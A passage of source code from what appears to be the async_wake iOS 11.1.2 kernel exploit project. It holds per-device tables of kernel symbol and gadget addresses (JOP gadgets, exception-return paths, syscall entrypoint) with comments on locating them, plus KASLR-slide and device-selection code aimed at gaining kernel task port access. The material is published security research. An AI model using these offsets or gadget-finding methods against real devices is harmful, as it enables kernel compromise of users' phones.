0xfffffff0074fc164, // KSYMBOL_UUID_COPY 79 | 0xfffffff0075b2000, // KSYMBOL_CPU_DATA_ENTRIES 80 | 0xfffffff0070cc1d4, // KSYMBOL_VALID_LINK_REGISTER 81 | 0xfffffff0070cc1ac, // KSYMBOL_X21_JOP_GADGET 82 | 0xfffffff0070cc474, // KSYMBOL_EXCEPTION_RETURN 83 | 0xfffffff0070cc42c, // KSYMBOL_THREAD_EXCEPTION_RETURN 84 | 0xfffffff0071e1998, // KSYMBOL_SET_MDSCR_EL1_GADGET 85 | 0xfffffff007439b20, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // this is actually 1 instruction in to the entrypoint 86 | 0xfffffff0071de074, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP 87 | 0xfffffff0071dea24, // KSYMBOL_SLEH_SYNC_EPILOG 88 | }; 89 | 90 | uint64_t ksymbols_iphone_x_15B202[] = { 91 | 0xfffffff0074f9948, // KSYMBOL_OSARRAY_GET_META_CLASS, 92 | 0xfffffff00758b03c, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 93 | 0xfffffff00758c7b0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 94 | 0xfffffff007400974, // KSYMBOL_CSBLOB_GET_CD_HASH 95 | 0xfffffff00710232c, // KSYMBOL_KALLOC_EXTERNAL 96 | 0xfffffff00710235c, // KSYMBOL_KFREE 97 | 0xfffffff007102358, // KYSMBOL_RET 98 | 0xfffffff007513324, // KSYMBOL_OSSERIALIZER_SERIALIZE, 99 | 0xfffffff0075b2694, // KSYMBOL_KPRINTF 100 | 0xfffffff00751e1d8, // KSYMBOL_UUID_COPY 101 | 0xfffffff0075d6000, // KSYMBOL_CPU_DATA_ENTRIES 102 | 0xfffffff0070cc1d4, // KSYMBOL_VALID_LINK_REGISTER 103 | 0xfffffff0070cc1ac, // KSYMBOL_X21_JOP_GADGET 104 | 0xfffffff0070cc474, // KSYMBOL_EXCEPTION_RETURN 105 | 0xfffffff0070cc42c, // KSYMBOL_THREAD_EXCEPTION_RETURN 106 | 0xfffffff0071e8630, // KSYMBOL_SET_MDSCR_EL1_GADGET 107 | 0xfffffff007454194, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // this is actually 1 instruction in to the entrypoint 108 | 0xfffffff0071e451c, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP 109 | 0xfffffff0071e4ed8, // KSYMBOL_SLEH_SYNC_EPILOG 110 | }; 111 | 112 | uint64_t ksymbols_ipod_touch_6g_15b202[] = { 113 | 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS, 114 | 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 115 | 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 116 | 0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH 117 | 0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL 118 | 0xFFFFFFF0070C8740, // KSYMBOL_KFREE 119 | 0xFFFFFFF0070C873C, // KYSMBOL_RET 120 | 0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE, 121 | 0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF 122 | 0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY 123 | 0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment 124 | 0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1)) 125 | 0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register) 126 | 0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF] 127 | 0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return 128 | 0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1 129 | 0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint) 130 | 0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49 131 | 0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code." 132 | }; 133 | 134 | // 6p (N56ap) 135 | uint64_t ksymbol_iphone_6p_15b202[] = { 136 | 0xfffffff0074a4a4c, // __ZNK7OSArray12getMetaClassEv 137 | 0xfffffff007533cf8, // __ZNK12IOUserClient12getMetaClassEv 138 | 0xfffffff0075354a0, // __ZN12IOUserClient24getTargetAndTrapForIndexEPP9IOServicej 139 | 0xfffffff0073b71e4, // _csblob_get_cdhash 140 | 0xfffffff0070c8710, // _kalloc_external 141 | 0xfffffff0070c8740, // _kfree 142 | 0xFFFFFFF0070C873C, // ret 143 | 0xfffffff0074be978, // __ZNK12OSSerializer9serializeEP11OSSerialize 144 | 0xfffffff007559fd0, // kprintf 145 | 0xfffffff0074c9910, // _uuid_copy 146 | 0xfffffff00757E000, // _DATA:__data + 0x6000 147 | // 0x4DDE74 + 148 | 0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1)) 149 | 0xFFFFFFF007098180, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register) 150 | 0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF] 151 | 0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return 152 | 0xFFFFFFF0071ACCB8, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1 153 | 0xFFFFFFF0074062F0, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint) 154 | 0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49 155 | 0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code." 156 | 157 | }; 158 | 159 | uint64_t ksymbols_iphone_6s_15b202[] = { 160 | 0xFFFFFFF00748D548, // KSYMBOL_OSARRAY_GET_META_CLASS, 161 | 0xFFFFFFF00751C4D0, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 162 | 0xFFFFFFF00751DC78, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 163 | 0xFFFFFFF0073A1054, // KSYMBOL_CSBLOB_GET_CD_HASH 164 | 0xFFFFFFF0070B8088, // KSYMBOL_KALLOC_EXTERNAL 165 | 0xFFFFFFF0070B80B8, // KSYMBOL_KFREE 166 | 0xFFFFFFF0070B80B4, // KYSMBOL_RET 167 | 0xFFFFFFF0074A7248, // KSYMBOL_OSSERIALIZER_SERIALIZE, 168 | 0xFFFFFFF0075426C4, // KSYMBOL_KPRINTF 169 | 0xFFFFFFF0074B21E0, // KSYMBOL_UUID_COPY 170 | 0xFFFFFFF007566000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment 171 | 0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1)) 172 | 0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register) 173 | 0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF] 174 | 0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return 175 | 0xFFFFFFF007197AB0, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1 176 | 0xFFFFFFF0073EFB44, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint) 177 | 0xFFFFFFF0071941D8, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49 178 | 0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code." 179 | }; 180 | 181 | uint64_t ksymbols_iphone_6_15b202[] = { 182 | 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS, 183 | 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 184 | 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 185 | 0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH 186 | 0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL 187 | 0xFFFFFFF0070C8740, // KSYMBOL_KFREE 188 | 0xFFFFFFF0070C873C, // KYSMBOL_RET 189 | 0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE, 190 | 0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF 191 | 0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY 192 | 0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment 193 | 0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1)) 194 | 0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register) 195 | 0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF] 196 | 0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return 197 | 0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1 198 | 0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint) 199 | 0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49 200 | 0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code." 201 | }; 202 | 203 | uint64_t ksymbols_ipad_mini_2_wifi_15b202[] = { 204 | 0xFFFFFFF0074947EC, // KSYMBOL_OSARRAY_GET_META_CLASS, 205 | 0xFFFFFFF007523A98, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 206 | 0xFFFFFFF007525240, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 207 | 0xFFFFFFF0073A6F84, // KSYMBOL_CSBLOB_GET_CD_HASH 208 | 0xFFFFFFF0070B8590, // KSYMBOL_KALLOC_EXTERNAL 209 | 0xFFFFFFF0070B85C0, // KSYMBOL_KFREE 210 | 0xFFFFFFF0070B85BC, // KYSMBOL_RET 211 | 0xFFFFFFF0074AE718, // KSYMBOL_OSSERIALIZER_SERIALIZE, 212 | 0xFFFFFFF007549D40, // KSYMBOL_KPRINTF 213 | 0xFFFFFFF0074B96B0, // KSYMBOL_UUID_COPY 214 | 0xFFFFFFF00756E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment 215 | 0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1)) 216 | 0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register) 217 | 0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF] 218 | 0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return 219 | 0xFFFFFFF00719CF44, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1 220 | 0xFFFFFFF0073F6094, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint) 221 | 0xFFFFFFF007198EC0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49 222 | 0xfffffff0071998BC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code." 223 | }; 224 | 225 | uint64_t ksym(enum ksymbol sym) { 226 | if (kernel_base == 0) { 227 | if (!have_kmem_read()) { 228 | printf("attempted to use symbols prior to gaining kernel read\n"); 229 | return 0; 230 | } 231 | kernel_base = find_kernel_base(); 232 | kaslr_slide = find_kernel_base() - 0xFFFFFFF007004000; 233 | } 234 | //return symbols[sym] + kernel_base; 235 | return symbols[sym] + kaslr_slide; 236 | } 237 | 238 | int have_syms = 0; 239 | int probably_have_correct_symbols() { 240 | return have_syms; 241 | } 242 | 243 | void offsets_init() { 244 | size_t size = 32; 245 | char build_id[size]; 246 | memset(build_id, 0, size); 247 | int err = sysctlbyname("kern.osversion", build_id, &size, NULL, 0); 248 | if (err == -1) { 249 | printf("failed to detect version (sysctlbyname failed\n"); 250 | return; 251 | } 252 | printf("build_id: %s\n", build_id); 253 | 254 | struct utsname u = {0}; 255 | uname(&u); 256 | 257 | printf("sysname: %s\n", u.sysname); 258 | printf("nodename: %s\n", u.nodename); 259 | printf("release: %s\n", u.release); 260 | printf("version: %s\n", u.version); 261 | printf("machine: %s\n", u.machine); 262 | 263 | // set the offsets 264 | 265 | if (strcmp(build_id, "15B202") == 0) { 266 | offsets = kstruct_offsets_15B202; 267 | } else { 268 | offsets = kstruct_offsets_15B202; 269 | printf("unknown kernel build. If this is iOS 11 it might still be able to get tfp0, trying anyway\n"); 270 | have_syms = 0; 271 | return; 272 | } 273 | 274 | // set the symbols 275 | 276 | if (strstr(u.machine, "iPod7,1")) { 277 | printf("this is iPod Touch 6G, should work!\n"); 278 | symbols = ksymbols_ipod_touch_6g_15b202; 279 | have_syms = 1; 280 | } else if (strstr(u.machine, "iPhone9,3")) { 281 | printf("this is iPhone 7, should work!\n"); 282 | symbols = ksymbols_iphone_7_15B202; 283 | have_syms = 1; 284 | } else if (strstr(u.machine, "iPhone9,4")) { 285 | printf("this is iPhone 7 plus, should work!\n"); 286 | symbols = ksymbols_iphone_7_15B202; 287 | have_syms = 1; 288 | } else if (strstr(u.machine, "iPhone10,6")) { 289 | printf("this is iPhone X, should work!\n"); 290 | symbols = ksymbols_iphone_x_15B202; 291 | have_syms = 1; 292 | } else if (strstr(u.machine, "iPhone8,1")) { 293 | printf("this is iPhone 6s, should work!\n"); 294 | symbols = ksymbols_iphone_6s_15b202; 295 | have_syms = 1; 296 | } else if (strstr(u.machine, "iPhone7,1")) { 297 | printf("this is iPhone 6P, should work!\n"); 298 | symbols = ksymbol_iphone_6p_15b202; 299 | have_syms = 1; 300 | } else if (strstr(u.machine, "iPhone7,2")) { 301 | printf("this is iPhone 6, should work!\n"); 302 | symbols = ksymbols_iphone_6_15b202; 303 | have_syms = 1; 304 | } else if (strstr(u.machine, "iPad4,4")) { 305 | printf("this is iPad Mini 2 WiFi, should work!\n"); 306 | symbols = ksymbols_ipad_mini_2_wifi_15b202; 307 | have_syms = 1; 308 | } else if (strstr(u.machine, "iPhone6,2")) { 309 | printf("this is iPhone 5s, should work!\n"); 310 | symbols = ksymbols_ipad_mini_2_wifi_15b202; 311 | have_syms = 1; 312 | } else { 313 | printf("no symbols for this device yet\n"); 314 | printf("tfp0 should still work, but the kernel debugger PoC won't\n"); 315 | symbols = NULL; 316 | have_syms = 0; 317 | } 318 | } 319 | -------------------------------------------------------------------------------- /async_wake_ios/symbols.h: -------------------------------------------------------------------------------- 1 | #ifndef symbols_h 2 | #define symbols_h 3 | 4 | #include 5 | 6 | enum kstruct_offset { 7 | /* struct task */ 8 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 9 | KSTRUCT_OFFSET_TASK_REF_COUNT, 10 | KSTRUCT_OFFSET_TASK_ACTIVE, 11 | KSTRUCT_OFFSET_TASK_VM_MAP, 12 | KSTRUCT_OFFSET_TASK_NEXT, 13 | KSTRUCT_OFFSET_TASK_PREV, 14 | KSTRUCT_OFFSET_TASK_ITK_SPACE, 15 | KSTRUCT_OFFSET_TASK_BSD_INFO, 16 | 17 | /* struct ipc_port */ 18 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 19 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 20 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 21 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 22 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 23 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 24 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 25 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 26 | 27 | /* struct proc */ 28 | KSTRUCT_OFFSET_PROC_PID, 29 | 30 | /* struct ipc_space */ 31 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE, 32 | 33 | /* struct thread */ 34 | KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR, 35 | KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR, 36 | KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR, 37 | KSTRUCT_OFFSET_THREAD_CONTEXT_DATA, // thread.machine.contextData 38 | KSTRUCT_OFFSET_THREAD_UPCB, // thread.machine.upcb 39 | KSTRUCT_OFFSET_THREAD_UNEON, // thread.machine.uNeon 40 | KSTRUCT_OFFSET_THREAD_KSTACKPTR, 41 | 42 | /* struct processor */ 43 | KSTRUCT_OFFSET_PROCESSOR_CPU_ID, 44 | 45 | /* struct cpu_data */ 46 | KSTRUCT_OFFSET_CPU_DATA_EXCEPSTACKPTR, // despite the name this actually points to the top of the stack, not the bottom 47 | KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR, 48 | }; 49 | 50 | 51 | 52 | // the 53 | 54 | enum ksymbol { 55 | KSYMBOL_OSARRAY_GET_META_CLASS, 56 | KSYMBOL_IOUSERCLIENT_GET_META_CLASS, 57 | KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX, 58 | KSYMBOL_CSBLOB_GET_CD_HASH, 59 | KSYMBOL_KALLOC_EXTERNAL, 60 | KSYMBOL_KFREE, 61 | KSYMBOL_RET, 62 | KSYMBOL_OSSERIALIZER_SERIALIZE, 63 | KSYMBOL_KPRINTF, 64 | KSYMBOL_UUID_COPY, 65 | KSYMBOL_CPU_DATA_ENTRIES, 66 | KSYMBOL_VALID_LINK_REGISTER, 67 | KSYMBOL_X21_JOP_GADGET, 68 | KSYMBOL_EXCEPTION_RETURN, 69 | KSYMBOL_THREAD_EXCEPTION_RETURN, 70 | KSYMBOL_SET_MDSCR_EL1_GADGET, 71 | KSYMBOL_WRITE_SYSCALL_ENTRYPOINT, 72 | KSYMBOL_EL1_HW_BP_INFINITE_LOOP, 73 | KSYMBOL_SLEH_SYNC_EPILOG 74 | }; 75 | 76 | int koffset(enum kstruct_offset); 77 | 78 | uint64_t ksym(enum ksymbol); 79 | 80 | void offsets_init(void); 81 | void symbols_init(void); 82 | int probably_have_correct_symbols(void); 83 | 84 | #endif 85 | --------------------------------------------------------------------------------